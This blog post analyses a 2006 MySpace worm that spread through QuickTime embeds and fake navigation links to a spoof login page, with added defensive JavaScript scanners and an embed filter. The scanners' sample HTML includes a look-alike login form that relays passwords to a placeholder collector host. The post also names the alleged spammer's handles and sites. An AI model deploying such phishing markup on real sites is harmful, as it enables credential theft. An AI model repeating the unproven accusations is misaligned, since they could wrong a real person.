MySpace Worm: Phishing Accounts and Spreading Zango Porn

Yesterday, a metric ton of MySpace accounts were infected with yet another worm. As I predicted ten days ago, it was accomplished via a QuickTime embed. Visiting the profile of anyone infected caused the navigation links across the top of your own profile (Home | Browse | Search | Invite | etc…) to be replaced by fake navigation links, all pointing to a spoof MySpace login page, via some basic CSS and HTML added to your “About Me” section. The QuickTime embed was also added to one of your “Interests” sections so that your profile would in turn infect your visitors. Note what that means: the JavaScript launched by the QuickTime file runs in the visitor’s browser, inside the visitor’s logged-in MySpace session, so it can edit the visitor’s own profile without ever knowing their password. At a glance, this looked like nothing more than a worm being used to phish MySpace passwords.

I downloaded the .mov (QuickTime file) and opened it in a text editor to see what it was triggering to cause this mess. It was plainly clear that the JavaScript it executed, loaded from the same domain as the spoof login page, was intended to do more than inject the phishing code and spread the worm. It also contained code to send internal MySpace messages to random people with MySpace friend IDs between 80000000 and 105000000. That attempt fell flat, but the intent was there nonetheless. Why did it fail? Either poor coding or MySpace’s spam filter. This ill-fated spam attempt is what revealed the identity of the guy behind the worm… Well, it made it so that he won’t be all that hard to track down anyway.
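As an added example (not code from the original post, and not MySpace’s), here is a scanner for the two profile modifications described above: a QuickTime embed pulled from a third-party host in a user-editable section, and a set of fake navigation links whose visible text matches the site’s own nav bar but whose href leaves the site. The sample HTML is constructed, every hostname is a placeholder, and the site host and navigation labels are assumptions.

```javascript
// Added example, not code from the original post or from MySpace: a scanner for
// the two modifications the post describes on an infected profile. The HTML
// samples below are constructed and every hostname is a placeholder; the real
// worm's domains are deliberately not reproduced.

const SITE_HOST = "myspace.com"; // assumption: the site whose profiles are scanned
// Assumption: a partial list of the site's own navigation labels.
const NAV_LABELS = new Set(["home", "browse", "search", "invite", "mail", "blog",
  "forum", "groups", "events", "videos", "music", "classifieds"]);

// Resolve relative URLs against the site itself, so "/home" is on-site while
// "//evil.example/x" and "http://evil.example/x" are not.
function hostOf(url) {
  try { return new URL(url, `http://${SITE_HOST}/`).hostname.toLowerCase(); } catch { return null; }
}
function isOffSite(host) {
  return host !== null && host !== SITE_HOST && !host.endsWith(`.${SITE_HOST}`);
}

// (a) <embed>/<object>/<param> tags that load QuickTime content. Profile sections
// are user-controlled HTML, so a .mov pulled from a third-party host is the
// propagation vector the post describes.
function findQuickTimeEmbeds(html) {
  const hits = [];
  const tagRe = /<(embed|object|param)\b[^>]*>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[0];
    const src = (tag.match(/\b(?:src|data|value)\s*=\s*["']?([^"'\s>]+)/i) || [])[1] || null;
    const type = (tag.match(/\btype\s*=\s*["']?([^"'\s>]+)/i) || [])[1] || null;
    const isQuickTime = (type !== null && /quicktime/i.test(type)) ||
      (src !== null && /\.(mov|qt)(\?|$)/i.test(src));
    if (isQuickTime) {
      hits.push({ tag: m[1].toLowerCase(), src, offSite: src !== null && isOffSite(hostOf(src)) });
    }
  }
  return hits;
}

// (b) links whose visible text imitates the site's own navigation bar but whose
// href leaves the site: the fake "Home | Browse | Search | Invite" overlay.
function findSpoofedNavLinks(html) {
  const hits = [];
  const aRe = /<a\b[^>]*href\s*=\s*["']?([^"'\s>]+)[^>]*>([\s\S]*?)<\/a>/gi;
  let m;
  while ((m = aRe.exec(html)) !== null) {
    const href = m[1];
    const text = m[2].replace(/<[^>]+>/g, "").trim().toLowerCase();
    if (NAV_LABELS.has(text) && isOffSite(hostOf(href))) hits.push({ text, href });
  }
  return hits;
}

// Combine both checks over the user-editable sections of one profile.
function scanProfile({ aboutMe, interests }) {
  const html = `${aboutMe}\n${interests}`;
  const embeds = findQuickTimeEmbeds(html).filter((h) => h.offSite);
  const navLinks = findSpoofedNavLinks(html);
  return { infected: embeds.length > 0 || navLinks.length > 0, embeds, navLinks };
}

// Constructed sample of an infected profile's user-editable sections.
const SAMPLE_ABOUT_ME = `
<div style="position:absolute; top:0; left:0;">
  <a href="http://login-lookalike.example/index.php">Home</a> |
  <a href="http://login-lookalike.example/index.php">Browse</a> |
  <a href="http://login-lookalike.example/index.php">Search</a> |
  <a href="http://login-lookalike.example/index.php">Invite</a>
</div>
<a href="/home">Home</a>`;
const SAMPLE_INTERESTS = `
<embed src="http://media-host.example/clip.mov" type="video/quicktime" autoplay="true" width="1" height="1">
<object><param name="src" value="http://myspace.com/legit.mov"></object>`;

console.log(JSON.stringify(scanProfile({ aboutMe: SAMPLE_ABOUT_ME, interests: SAMPLE_INTERESTS }), null, 2));
```

The regular expressions are enough for the sample, but a production check should run over parsed HTML with entities decoded, since an attacker who knows the filter will split tags, use `&#x2F;` in URLs, or load the movie through a redirector on an allowed host.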

The intended MySpace message spam would have randomly used one of the following subject lines:

what else is there to do on a Sunday.?…….
You better not forget about this..
Hehe that was so funny..
better see this one last time lol..
omg did you see this last nite..
whos coming to the party tonight.?..

And, the body of the message would have contained a fake YouTube video image (pictured below) linked to a site pushing Zango installs (nasty adware).

*The web addresses listed in the below paragraph contain adult content*
The URL that the fake YouTube video would have linked to is what gave this guy up: http://google.com/url?q=http://www.vidchicks.com/home.php. That “home.php” simply redirects you to the same URL you’d get as a pop-under if you visited any page on Vidchicks.com: http://www.vidchicks.com/popunder.html. And that popunder.html is simply a landing page being used to get people to install some adware courtesy of Zango. I was able to dig up all kinds of dirt on the webmaster of Vidchicks.com. I’ll get to that in a second.

On the landing page he’s pushing the Zango installs from, he has visitor tracking logged by the public version of Extremetracking.com. If you’re reading this before they pull his account, those stats can be found here. The visitor stats there are pretty telling: he has been spamming the hell out of MySpace from those phished accounts via messages, comments, and bulletins.

The below shows unique visits:

Visiting a few of the MySpace profiles he has gotten visitors from recently showed that he has been posting various images as comments from phished accounts to get people to visit that Zango landing page of his. Sometimes he simply posts the same fake YouTube video as above. Other times, he’ll post stuff like the below:

So, he’s basically just scumming it up in any way that he can. After doing a bit of research on this guy I found that this is his typical behavior.

Here’s a taste of the pile of dirt I found on this guy:

1. He goes by a number of different names on webmaster forums because he has a knack for doing shady stuff. If you’re doing business with a guy that goes by the name eLogic or Creepah, I highly suggest that you stop. Those are two of his handles for sure. The eLogic name is used on some forums where he does traffic trades and whatnot. And, he tried to sell Vidchicks.com on DNForum a few weeks back under the name Creepah. Oh yeah, Vidchicks.com is registered under the fake business name of eLogic Inc.

2. He was banned from a webmaster forum for creating a fake account to bid on one of his own auctions to drive the price of a site up. *No url included because it’s a private forum

Here’s a screenshot from his Digg.com account:
14 stories dugg and 20 submitted. *Holds up a “yes, this guy is that clueless” sign*

5. Who cares? I think all of the above establishes this guy as a typical spammer.

In conclusion:
– MySpace killed off that worm yesterday by adding the domains he was using to their spam filter’s list and getting the hosts to pull those files. This is just a temp fix though. They’ll need to ban QuickTime files if they want to prevent this kind of stuff from happening on a daily basis.

– The guy behind this is obviously in blatant violation of numerous laws. If any law enforcement or other government agency wants to take action against him, it’ll be real easy to nail him down. On all the webmaster forums he has been consistent in saying that he’s from the UK. That isn’t necessarily true, but a subpoena served on any of his income sources (Zango, Adult AdWorld, etc.) would turn up an address for sure. ;-)

– I’ve got the flu and didn’t sleep last night, so excuse any typos and/or other sloppiness in the above.

Update (12/01/06):

“MySpace killed off that worm yesterday by adding the domains he was using to their spam filter’s list and getting the hosts to pull those files. This is just a temp fix though. They’ll need to ban QuickTime files if they want to prevent this kind of stuff from happening on a daily basis.”

Well, MySpace has apparently decided to try to handle this issue differently. And, the same worm is spreading around today using different domains to host the QuickTime file, Spoof Login page, and JavaScript. I guesstimate that at least 1/10th of all active users were infected by this thing over the past few days. And, there is no telling how many accounts have been phished. Yesterday, MySpace Tom posted the below:

I think that makes it pretty safe to say that the MySpace crew has come to the same conclusion as me: a metric TON of people have already been phished via this worm setup. I smell a lot of spam in the near future.

Yesterday, I didn’t mention a part of this guy’s hustle that is pretty interesting. He is hosting the files being used for this worm on domains he has compromised. I imagine he is doing this in order to have a little room for denial. “Dude, I don’t know what you guys are talking about. Someone else is spamming the hell out of that place with the url to my Zango page.” Yeah, sure.

As of right now:
He cleaned up his JavaScript a bit, and it now randomly inserts the QuickTime file from one of two domains. Yesterday he was also using two domains, but each was a standalone operation doing the exact same thing. Now the QuickTime file, JavaScript, and spoof login page are spread across two separate domains working together. His phishing efforts have been cut short, though: both spoof login pages are set to post the submitted credentials to a third domain (a .edu) which is already down, and the webmaster of one of the domains added some text to the spoof login page on his domain warning people that it’s a fake:
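The relay setup just described (a spoof login page on one domain posting the captured credentials to a third) is easy to spot mechanically. As an added example that is not part of the original post, the following flags every form on a page that collects a password but whose `action` resolves to a host other than the page’s own. The sample page is constructed; the hostnames are placeholders for the spoof-login domain and the collector, not the real ones.

```javascript
// Added example, not code from the post: flag forms that collect a password but
// post it to a host other than the page's own. The page below is constructed and
// the hostnames are placeholders.

function hostOf(url, base) {
  try { return new URL(url, base).hostname.toLowerCase(); } catch { return null; }
}

function findCredentialExfilForms(html, pageUrl) {
  const pageHost = hostOf(pageUrl, pageUrl);
  const results = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    const [, attrs, body] = m;
    // Only forms that actually collect a password are interesting here.
    if (!/<input\b[^>]*\btype\s*=\s*["']?password\b/i.test(body)) continue;
    // A missing or empty action posts back to the page itself.
    const action = (attrs.match(/\baction\s*=\s*["']?([^"'\s>]+)/i) || [])[1] || pageUrl;
    const actionHost = hostOf(action, pageUrl);
    results.push({ action, actionHost, crossHost: actionHost !== pageHost });
  }
  return results;
}

// Only the cross-host password forms: the ones that relay credentials elsewhere.
function exfilForms(html, pageUrl) {
  return findCredentialExfilForms(html, pageUrl).filter((f) => f.crossHost);
}

// Constructed sample: a look-alike login page that relays credentials to a
// third host, plus a search form and a same-host login form for contrast.
const SAMPLE_PAGE_URL = "http://spoof-login.example/index.php";
const SAMPLE_SPOOF_LOGIN = `
<form method="post" action="http://collector.example.edu/log.php">
  E-Mail: <input type="text" name="email">
  Password: <input type="password" name="password">
  <input type="submit" value="Login">
</form>
<form method="get" action="/search">
  <input type="text" name="q">
</form>
<form method="post" action="/login">
  <input type="text" name="email"><input type="password" name="password">
</form>`;

console.log(exfilForms(SAMPLE_SPOOF_LOGIN, SAMPLE_PAGE_URL));
```

A phishing page that posts to its own domain passes this check, so it should be paired with a comparison against the brand’s real domain (a page that looks like MySpace but is not served from myspace.com is the more basic tell); what this catches is the relay-to-a-third-host pattern, which is also what left the .edu collector as the single point of failure here.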

I’m not sure if he has this same double-whammy setup on any other domains right now though. If not, I’m sure he will soon enough. I’ll say it again: this is not going away until MySpace bans QuickTime embeds.

Besides this story getting all that exposure, it has taken a few turns since my last update. And, I have a small correction to make about something I said…

“MySpace killed off that worm yesterday by adding the domains he was using to their spam filter’s list and getting the hosts to pull those files.”
Yeah, I was wrong about that. The servers the files were on simply couldn’t handle all the traffic. A day later they quit 404ing, and one of the four domains is still hosting the files.

I was also wrong in saying “[MySpace]’ll need to ban QuickTime files if they want to prevent this kind of stuff from happening on a daily basis”. They contacted Apple asking for a patch, and Apple has provided a temporary one that helps Internet Explorer users, with a permanent solution on the way. I find this a bit odd, since this worm setup used a QuickTime feature, not a QuickTime flaw: a movie file can carry a link that the player opens, and that link can be JavaScript. It was a shortsighted feature, insecure by design, but a “feature” nonetheless.

This has stirred up a bit of debate on who is to blame, MySpace or Apple. Personally, I think they both screwed up on this one. Apple, for thinking that launching JavaScript from streaming media was a bright idea. MySpace, for not having a security team in place that keeps up with industry news to avoid stuff like this, for doing a piss-poor job of letting their users know what was going on, and for not providing a temporary fix before they got that temp fix from Apple: banning QuickTime embeds for a few days would have saved tens of thousands of people from being phished. And, and, and… Well, you get the point.
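The stop-gap argued for above, a ban on QuickTime embeds in profile HTML, is a filter on user-supplied markup before it is stored. As an added example that is not MySpace’s code, the following drops every `<object>…</object>`, `<embed>` and stray `<param>` that declares a QuickTime type or a .mov/.qt URL, and goes a step further than the post: it also drops any of those tags whose absolute URLs point anywhere but an allow-listed media host, because the worm’s files sat on compromised third-party domains and a type or extension check alone is easy to sidestep. `ALLOWED_MEDIA_HOSTS` and the sample profile are assumptions.

```javascript
// Added example, not MySpace's code: an allow-list filter for user-supplied
// profile HTML. Drops embed/object/param tags that declare QuickTime content or
// that reference any host not on the allow list. ALLOWED_MEDIA_HOSTS and the
// sample input are assumptions.

const ALLOWED_MEDIA_HOSTS = new Set(["myspace.com"]); // assumption

// No base URL on purpose: a protocol-relative "//host/x" cannot be resolved here
// and is therefore treated as not allowed, which is the safe direction.
function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return null; }
}

// Only absolute (or protocol-relative) URLs can leave the site; a relative URL
// resolves to the site's own host and is not checked.
function referencesOnlyAllowedHosts(fragment) {
  const urls = [...fragment.matchAll(/(?:https?:)?\/\/[^"'\s>]+/gi)].map((m) => m[0]);
  return urls.every((u) => ALLOWED_MEDIA_HOSTS.has(hostOf(u)));
}

// A declared QuickTime MIME type or a .mov/.qt URL. Bypassable on its own
// (the server's Content-Type decides what the plugin gets), hence the host check.
function declaresQuickTime(fragment) {
  return /\btype\s*=\s*["']?video\/quicktime\b/i.test(fragment) ||
    /\.(mov|qt)(["'?\s>]|$)/i.test(fragment);
}

function stripDisallowedEmbeds(html) {
  const removed = [];
  const keepOrDrop = (fragment) => {
    if (declaresQuickTime(fragment) || !referencesOnlyAllowedHosts(fragment)) {
      removed.push(fragment);
      return "";
    }
    return fragment;
  };
  // Whole <object> blocks first (their <param> children carry the src), then
  // stand-alone <embed> and any <param> left outside an object.
  let out = html.replace(/<object\b[^>]*>[\s\S]*?<\/object>/gi, keepOrDrop);
  out = out.replace(/<(?:embed|param)\b[^>]*>/gi, keepOrDrop);
  return { html: out, removed };
}

// Constructed sample: two QuickTime references on an outside host and one
// Flash player on the allow-listed host.
const SAMPLE_PROFILE_HTML = `
<p>About me text</p>
<embed src="http://media-host.example/clip.mov" type="video/quicktime" width="1" height="1">
<object><param name="src" value="//media-host.example/clip2.mov"></object>
<embed src="http://myspace.com/players/song.swf" type="application/x-shockwave-flash">
<p>more text</p>`;

const result = stripDisallowedEmbeds(SAMPLE_PROFILE_HTML);
console.log(result.html);
console.log(`removed ${result.removed.length} tag(s)`);
```

Because the filter keeps only what it can positively vouch for, it fails closed on anything it cannot parse (an unresolvable URL is treated as disallowed). As with any regex-based filter, the real thing should operate on parsed, entity-decoded HTML.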

MySpace Tom posted the below yesterday:

It linked to a page with the temporary QuickTime patch Apple provided. After clicking the install button several times, I’m still not sure whether the damn thing installed. All of this is of course causing a ton of confusion amongst the MySpace crowd, so much so that MySpace Tom posted a blog about it (the blog entry has since been deleted, hmm). The very first line of it is factually incorrect and sure to piss off the guys at Apple:

“the security problems this weekend were related to a hole in activex quicktime installer.”

Dude, are you high??? That’s nonsense, and it isn’t true. Plus, it sure looks like you’re trying to place all the blame on Apple. Not a very slick move considering you’re waiting for a permanent fix from them.

He goes on to explain that the download is legit, that the post about it was really by him, etc. It’s pretty sad when a site’s user base is so accustomed to deception, scams, worms, and other nastiness that they don’t even know whether an update from the poster boy of the site is real.


I’m having the same problem as others… my add comments link just suddenly disappeared last night, no clue why! I found code on the net to get it back and it’s back, only it’s in the wrong section (the web page where I got the code said to copy and paste the code at the end of the Who I’d Like to Meet section, and I did, so that’s where it is showing up, not in the Comments section where it should be)!

HELP!!! At least my friends can leave me comments now, but I would like it back where it belongs! Plus, I’m worried that my account will start to get all screwed up from being phished! I would appreciate any assistance!

My MySpace has been acting up. I mean I can’t even sign into it because I guess I re-signed in accidentally because I thought it was MySpace but it was really a site called freeweb? So now everybody has been telling me that there is an invisible code on all my links on my site. I have no idea how to fix it and I’ve already emailed MySpace about it and still no reply. I need major help!

I recently logged into my account and all of my friends have disappeared?? I do not know if this is an act of phishing, or getting a worm?? I need your help, please, if there is any information, help me!!!

Hello, I don’t know why my MySpace is so strange… whenever I want to edit my profile it won’t let me, or people don’t receive my messages or comments; they also can’t see my friend requests. All of a sudden, it won’t let me post pictures in my comments either. And sometimes, my profile will go back to its original plain “mode”.

Every time I try to log in to MySpace a big purple mouse called Steven runs across the screen singing “O When the Saints”.
Does anyone know what I can do? It’s getting quite annoying. Email me at iloverimming69style@yahoo.co.uk, thanks.
Joe

As of four days ago, I couldn’t login to the MS account. I can still see it from a “band” account, so it isn’t TOS deletion. Of course, eventually it asked me to enter the captcha codes, still no go and then lockout for too many attempts. I have a feeling that tech support is all bots. No response. Worse, the account in question is linked to an old, dead email address. (I know, I know). Anybody else having these “sit tight” problems? The MySpace Help profile listed login issues for two straight days but they are no longer listed. Thanks all.

I have been trying to contact MySpace regarding my account. I made the attempt to change my email address this past Sunday and thought I was successful. Received the email from them with the confirmation code etc… well… now I can’t even get into the account with either email address, and when I go to see if maybe the password was changed or something… It says that both email addresses are not valid. I have emailed them several times and don’t know what to do. Could you help me and let me know how I can get this resolved or even get the stupid thing deleted and start over. Just send me an email~!! TIA!!

YOOO!! I was on my MySpace last night and it says I got phished and I have to change my password but every time I try it says passwords don’t match… BUT THEY DO!!! I’ve done it like a million times. I’ve tried changing my email and everything but still it won’t work. What should I do???

OK, I got phished today.
I changed my password but it won’t work.
My safe mode is hidden now. I can’t get to it.
It’s not possible to go to edit profile because of the spammer, so there is nothing I can do! The same thing happened to my brother. Can anyone please help!